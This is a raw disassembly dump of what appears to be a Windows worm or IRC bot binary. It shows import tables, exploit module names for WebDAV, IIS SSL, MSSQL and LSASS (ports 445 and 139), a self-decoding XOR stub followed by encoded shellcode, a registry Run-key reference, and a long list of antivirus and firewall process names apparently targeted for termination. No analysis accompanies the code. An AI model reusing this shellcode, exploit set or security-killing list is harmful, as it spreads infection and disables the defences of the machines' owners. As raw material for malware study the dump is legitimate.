dd 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h, 7C8329D9h
dd 7C812782h, 7C835DCAh, 7C809BF8h, 7C80A0D4h, 7C8216A4h
dd 7C80DDF5h, 7C831EABh, 7C801E16h, 7C80BAA1h, 7C8309E1h
dd 7C81CE03h, 7C835E8Fh, 7C809920h, 7C8286EEh, 7C802520h
dd 7C80E93Fh, 7C81AE17h, 7C85F90Fh, 7C80DDFEh, 7C81E0C7h
dd 7C81B58Bh, 7C80D262h, 7C812ADEh, 7C830B14h, 7C873A31h
dd 7C80A05Dh, 7C8310F2h, 7C832044h, 7C812A09h, 7C9109EDh
dd 7C80BCCFh, 7C809E01h, 7C84467Dh, 7C80A427h, 7C809EF1h
dd 7C812641h, 7C81DC03h, 7C91043Dh, 7C9179FDh, 7C9105D4h
dd 7C8017E5h, 7C937A40h, 7C801EEEh, 7C812F1Dh, 7C8136D7h
dd 7C910340h, 7C809728h, 7C809BC5h, 7C809740h, 7C812D9Fh
dd 7C810EF8h, 7C812BB6h, 7C809AE4h, 7C809A51h, 7C809E79h
dd 7C838DE8h, 7C80CCA8h, 7C809915h, 7C8127A7h, 7C812E76h
dd 7C812F39h, 7C862E2Ah, 7C81DF77h, 7C81CF5Bh, 7C814AE7h
dd 7C812F08h, 7C80CC97h, 7C810E51h, 7C801AD0h, 7C812D56h
dd 7C80B9D1h, 7C838A0Ch, 7C80A490h, 0
dd 80000015h, 8000000Ah, 80000002h, 8000000Dh, 80000012h
dd 80000097h, 80000001h, 80000010h, 80000013h, 80000073h
dd 80000017h, 8000000Bh, 80000004h, 80000003h, 80000074h
dd 80000009h, 0
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0BEh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 10h
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 10h
aE_0 db 'e',0
aCreatethread db 'CreateThread',0
align 10h
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aM_1 db '',0
aExitthread db 'ExitThread',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 3
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aV db 'v',0
aDeletecritical db 'DeleteCriticalSection',0
db 5Ch ; \
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db '',0
aExitprocess db 'ExitProcess',0
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 4
db ',',0
aClosehandle db 'CloseHandle',0
dw 376h
aWritefile db 'WriteFile',0
aJ_0 db 'J',0
aCreatefilea db 'CreateFileA',0
db 0A6h ;
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
db '',0
aFindclose db 'FindClose',0
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
db 0, 90h, 2
aReadfile_0 db 'ReadFile',0
align 2
dw 2F1h
aSetfilepointer db 'SetFilePointer',0
align 10h
dd 6547014Dh, 6C694674h, 7A695365h, 1BF0065h, 54746547h
dd 46656D69h, 616D726Fh, 4174h, 65470133h, 74614474h, 726F4665h
dd 4174616Dh, 1480000h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 89h ;
db 1, 47h, 65h
aTprocaddress db 'tProcAddress',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aR_0 db '',0
aFormatmessagea db 'FormatMessageA',0
align 10h
db 0E9h ;
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 10h
db 0E2h ;
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 345h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 44h ; D
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aK_0 db 'K',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 2F5h
aSetfiletime db 'SetFileTime',0
dd 6547014Fh, 6C694674h, 6D695465h, 0AE0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 2EFh
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0B6h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 51h ; Q
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 369h
aWidechartomult db 'WideCharToMultiByte',0
db 1
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 395h
aLstrcmpia db 'lstrcmpiA',0
dw 261h
aOpenprocess db 'OpenProcess',0
dd 65540332h, 6E696D72h, 54657461h, 61657268h, 24A0064h
dd 65766F4Dh, 656C6946h, 1300041h
aGetcurrentproc db 'GetCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
db 65h ; e
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 144h
aGetexitcodepro db 'GetExitCodeProcess',0
align 10h
db 6Ch ; l
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
aI_1 db '',0
aDuplicatehandl db 'DuplicateHandle',0
db '[',0
aCreatepipe db 'CreatePipe',0
align 10h
db 0C8h ;
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
dd 6547015Dh, 636F4C74h, 49656C61h, 416F666Eh, 1C80000h
dd 56746547h, 69737265h, 78456E6Fh, 1610041h, 4C746547h
dd 6369676Fh, 72446C61h, 73657669h, 0EA0000h
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 363h
aWaitformultipl db 'WaitForMultipleObjects',0
align 4
db 0E3h ;
db 1, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
aKernel32_dll_0 db 'KERNEL32.dll',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
dd 654801F5h, 72467061h, 6565h, 654801F9h, 65527061h, 6F6C6C41h
dd 1EF0063h, 70616548h, 6F6C6C41h, 1AC0063h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 745202B1h, 776E556Ch, 646E69h, 6547019Ch, 61745374h
dd 70757472h, 6F666E49h, 0FD0041h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 6C540337h, 65724673h, 2FE0065h
dd 4C746553h, 45747361h, 726F7272h, 1320000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 39h ; 9
db 3, 54h, 6Ch
aSsetvalue db 'sSetValue',0
dw 338h
aTlsgetvalue db 'TlsGetValue',0
db 36h ; 6
db 3, 54h, 6Ch
aSalloc db 'sAlloc',0
align 4
db 0F3h ;
db 1, 48h, 65h
aApdestroy db 'apDestroy',0
dw 1F1h
aHeapcreate db 'HeapCreate',0
align 4
db 58h ; X
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
dw 355h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 214h
aIsbadwriteptr db 'IsBadWritePtr',0
dw 220h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 221h
aLcmapstringw db 'LCMapStringW',0
align 2
aI_2 db '',0
aGetacp db 'GetACP',0
align 10h
db 7Ch ; |
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0F1h ;
align 2
aGetcpinfo db 'GetCPInfo',0
db 9Eh ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 42h ; B
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aU_0 db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 13Fh
aGetenvironment db 'GetEnvironmentStrings',0
aF db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 41h ; A
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 2FAh
aSethandlecount db 'SetHandleCount',0
align 4
db 50h ; P
db 1, 47h, 65h
aTfiletype db 'tFileType',0
dw 35Bh
aVirtualprotect db 'VirtualProtect',0
align 4
db 0A8h ;
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 5Dh ; ]
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 9Fh ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1A2h
aGetstringtypew db 'GetStringTypeW',0
align 10h
db 0Ch
db 3, 53h, 65h
aTstdhandle_0 db 'tStdHandle',0
align 10h
db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 2
db 2, 49h, 6Eh
aItializecrit_0 db 'itializeCriticalSection',0
db 7Eh ; ~
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 31Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490211h, 52646142h, 50646165h, 7274h, 7349020Eh, 43646142h
dd 5065646Fh, 7274h, 654801FBh, 69537061h, 657Ah, 61520283h
dd 45657369h, 70656378h, 6E6F6974h, 2E80000h, 45746553h
dd 664F646Eh, 656C6946h
db 2 dup(0)
_rdata ends
; Section 3. (virtual address 0002A000)
; Virtual size : 00051678 ( 333432.)
; Section size in file : 00051678 ( 333432.)
; Offset to raw data for section: 0002A000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 42A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_42A000 dd 0 dd offset sub_41C9A7
dword_42A008 dd 0 dword_42A00C dd 0 dd offset sub_4165B6
dd offset sub_4195AD
dd offset sub_4196DE
dd offset sub_419AA1
dd offset sub_41CDA5
dword_42A024 dd 0 dword_42A028 dd 0 dd offset sub_41665F
dword_42A030 dd 0 dword_42A034 dd 0 ; DATA XREF: sub_414460:loc_4144EE�o
dd offset sub_41CDB8
dword_42A03C dd 0 aWebdav db 'webdav',0 ; DATA XREF: sub_40169B+155�o
align 4
db 2 dup(0)
aWebdav_0 db 'WebDav',0 ; DATA XREF: sub_411235+2B2�o
; .text:004119CD�o ...
align 4
dd 5 dup(0)
dword_42A068 dd 50h ; sub_4078FA+3A60�r ...
off_42A06C dd offset sub_411235 ; DATA XREF: sub_40169B+1F8�r
dword_42A070 dd 0 ; sub_411235+30E�r ...
dword_42A074 dd 1 dword_42A078 dd 0 aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 411749h, 0
dd 1, 0
aMssql db 'mssql',0
align 10h
dd 534D0000h, 4C5153h, 6 dup(0)
dd 599h, 4127C5h, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 411F7Eh, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 41214Ch, 0
dd 2 dup(1), 0Fh dup(0)
aLsass_445_1 db 'lsass_445',0
byte_42A1B2 db 1 ; DATA XREF: sub_4078FA:loc_40B2D2�r
; sub_4078FA+39E4�o
aLsass_139 db 'lsass_139',0
db 1, 2 dup(0)
dd 4 dup(0)
; ---------------------------------------------------------------------------
loc_42A1D0: ; DATA XREF: .text:0041185D�o
jmp short loc_42A1E2
; =============== S U B R O U T I N E =======================================
sub_42A1D2 proc near ; CODE XREF: sub_42A1D2:loc_42A1E2�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42A1DA: ; CODE XREF: sub_42A1D2+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42A1DA
jmp short loc_42A1E7
; ---------------------------------------------------------------------------
loc_42A1E2: ; CODE XREF: .data:loc_42A1D0�j
call sub_42A1D2
loc_42A1E7: ; CODE XREF: sub_42A1D2+E�j
jo short near ptr dword_42A164+1Eh
cwde
cdq
cdq
retn
sub_42A1D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
dword_42A350 dd 80000002h off_42A354 dd offset aSoftwareMicr_0 ; DATA XREF: sub_401E73+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42AF88h, 80000001h, 42AFC0h
dword_42A368 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42A3B4 dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_42A3D0: ; DATA XREF: sub_4028A8+10F�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42A3E4 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4028A8+138�o
off_42A3F8 dd offset aAdd ; DATA XREF: sub_40668A+59�r
; sub_406702+4A�r ...
; "Add"
off_42A3FC dd offset aAdded ; DATA XREF: sub_40668A+2D�r
; sub_406702+7C�r ...
; "Added"
dword_42A400 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 4211E0h, 4211D8h, 2, 4211CCh, 4211C0h, 3, 0
dword_42A450 dd 7530h align 8
off_42A458 dd offset aAckwin32_exe ; DATA XREF: sub_4070E8:loc_4071AF�r
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
